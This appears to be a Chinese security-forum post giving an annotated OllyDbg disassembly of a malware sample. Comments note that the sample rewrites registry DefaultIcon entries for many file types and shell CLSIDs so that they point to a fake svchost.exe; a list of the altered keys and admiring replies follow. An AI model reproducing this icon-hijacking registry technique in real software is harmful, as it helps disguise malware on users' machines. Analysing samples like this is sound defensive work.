004034BF|.52 push edx
004034C0|.E8 7B060000 call 00403B40
004034C5|.83C4 04 add esp, 4
004034C8|.8BF4 mov esi, esp
004034CA|.50 push eax ; /BufSize
004034CB|.8D85 F4FDFFFF lea eax, dword ptr ; |
004034D1|.50 push eax ; |Buffer
004034D2|.6A 02 push 2 ; |ValueType = REG_EXPAND_SZ
004034D4|.6A 00 push 0 ; |Reserved = 0
004034D6|.6A 00 push 0 ; |ValueName = NULL
004034D8|.8B4D FC mov ecx, dword ptr ; |
004034DB|.51 push ecx ; |hKey
004034DC|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表破坏文件图标指向C:\WINDOWS\system\svchost.exe
004034E2|.3BF4 cmp esi, esp
004034E4|.E8 D7060000 call 00403BC0
004034E9|.8BF4 mov esi, esp
004034EB|.8B55 FC mov edx, dword ptr
004034EE|.52 push edx ; /hKey
004034EF|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
004034F5|.3BF4 cmp esi, esp
004034F7|.E8 C4060000 call 00403BC0
004034FC|.8BF4 mov esi, esp
004034FE|.8B45 08 mov eax, dword ptr
00403501|.50 push eax ; /<%s>
00403502|.68 5CE74200 push 0042E75C ; |Format = "CLSID\%s"
00403507|.8D8D E4FBFFFF lea ecx, dword ptr ; |
0040350D|.51 push ecx ; |s
0040350E|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00403514|.83C4 0C add esp, 0C
00403517|.3BF4 cmp esi, esp
00403519|.E8 A2060000 call 00403BC0
0040351E|.8BF4 mov esi, esp
00403520|.8D95 F0FDFFFF lea edx, dword ptr
00403526|.52 push edx ; /pHandle
00403527|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040352C|.6A 00 push 0 ; |Reserved = 0
0040352E|.8D85 E4FBFFFF lea eax, dword ptr ; |
00403534|.50 push eax ; |Subkey
00403535|.68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
0040353A|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00403540|.3BF4 cmp esi, esp
00403542|.E8 79060000 call 00403BC0
00403547|.8BF4 mov esi, esp
00403549|.8D8D E8FCFFFF lea ecx, dword ptr
0040354F|.51 push ecx ; /pBufSize
00403550|.8D95 ECFCFFFF lea edx, dword ptr ; |
00403556|.52 push edx ; |Buffer
00403557|.6A 00 push 0 ; |pValueType = NULL
00403559|.6A 00 push 0 ; |Reserved = NULL
0040355B|.6A 00 push 0 ; |ValueName = NULL
0040355D|.8B85 F0FDFFFF mov eax, dword ptr ; |
00403563|.50 push eax ; |hKey
00403564|.FF15 7C834300 call dword ptr [<&ADVAPI32.RegQueryVa>; \查询其余文件格式
0040356A|.3BF4 cmp esi, esp
0040356C|.E8 4F060000 call 00403BC0
00403571|.8BF4 mov esi, esp
00403573|.8D8D ECFCFFFF lea ecx, dword ptr
00403579|.51 push ecx ; /<%s>
0040357A|.68 50E74200 push 0042E750 ; |Format = "%s.AI_Boy"
0040357F|.8D95 E0FAFFFF lea edx, dword ptr ; |
00403585|.52 push edx ; |s
00403586|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
0040358C|.83C4 0C add esp, 0C
0040358F|.3BF4 cmp esi, esp
00403591|.E8 2A060000 call 00403BC0
00403596|.8D85 E0FAFFFF lea eax, dword ptr
0040359C|.50 push eax
0040359D|.E8 9E050000 call 00403B40
004035A2|.83C4 04 add esp, 4
004035A5|.8BF4 mov esi, esp
004035A7|.50 push eax ; /BufSize
004035A8|.8D8D E0FAFFFF lea ecx, dword ptr ; |
004035AE|.51 push ecx ; |Buffer
004035AF|.6A 01 push 1 ; |ValueType = REG_SZ
004035B1|.6A 00 push 0 ; |Reserved = 0
004035B3|.6A 00 push 0 ; |ValueName = NULL
004035B5|.8B95 F0FDFFFF mov edx, dword ptr ; |
004035BB|.52 push edx ; |hKey
004035BC|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \相同方法操作
004035C2|.3BF4 cmp esi, esp
004035C4|.E8 F7050000 call 00403BC0
004035C9|.8BF4 mov esi, esp
004035CB|.8B85 F0FDFFFF mov eax, dword ptr
004035D1|.50 push eax ; /hKey
004035D2|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
0040322C|> \68 08E64200 push 0042E608 ;ASCII "{645FF040-5081-101B-9F08-00AA002F954E}"
00403231|.E8 15DEFFFF call 0040104B
00403236|.83C4 04 add esp, 4
00403239|.68 D8E54200 push 0042E5D8 ;ASCII "{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
0040323E|.E8 08DEFFFF call 0040104B
00403243|.83C4 04 add esp, 4
00403246|.68 A8E54200 push 0042E5A8 ;ASCII "{450D8FbA-AD25-11D0-98A8-0800361B1103}"
0040324B|.E8 FBDDFFFF call 0040104B
00403250|.83C4 04 add esp, 4
00403253|.68 78E54200 push 0042E578 ;ASCII "{208D2C60-3AEA-1069-A2D7-08002B30309D}"
00403258|.E8 EEDDFFFF call 0040104B
0040325D|.83C4 04 add esp, 4
00403260|.68 48E54200 push 0042E548 ;ASCII "{871C5380-42A0-1069-A2EA-08002B30309D}"
00403265|.E8 E1DDFFFF call 0040104B
具体修改了以下:
HKLM\SOFTWARE\Classes\batfile\DefaultIcon
HKLM\SOFTWARE\Classes\cmdfile\DefaultIcon
HKLM\SOFTWARE\Classes\comfile\DefaultIcon
HKLM\SOFTWARE\Classes\dllfile\DefaultIcon
HKLM\SOFTWARE\Classes\inffile\DefaultIcon
HKLM\SOFTWARE\Classes\regfile\DefaultIcon
HKLM\SOFTWARE\Classes\txtfile\DefaultIcon
HKLM\SOFTWARE\Classes\chm.file\DefaultIcon
HKLM\SOFTWARE\Classes\Excel.CSV\DefaultIcon
HKLM\SOFTWARE\Classes\exefile\DefaultIcon
HKLM\SOFTWARE\Classes\icofile\DefaultIcon
HKLM\SOFTWARE\Classes\jpegfile\DefaultIcon
HKLM\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKLM\SOFTWARE\Classes\PowerPoint.Show.8\DefaultIcon
HKLM\SOFTWARE\Classes\SoundRec\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.acc\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.mp4\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rm\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rmvb\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon
HKLM\SOFTWARE\Classes\icofile\DefaultIcon
HKLM\SOFTWARE\Classes\jpegfile\DefaultIcon
HKLM\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKLM\SOFTWARE\Classes\PowerPoint.Show.8\DefaultIcon
HKLM\SOFTWARE\Classes\SoundRec\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.acc\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.mp4\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rm\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rmvb\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon
HKLM\SOFTWARE\Classes\Word.Document.8\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\DefaultIcon
发表于凌晨4点44分,太强大了。 不是很看的懂,俺还是太笨了厄 膜拜阿郎哥大作~ :lol加入管理团队吧:handshake :funk:新娘太强悍了 这个是什么OD?太强大了!!!! 两个字:膜拜 这是什么啊,安全看不懂,羡慕啊 只能膜拜新郎了:)eee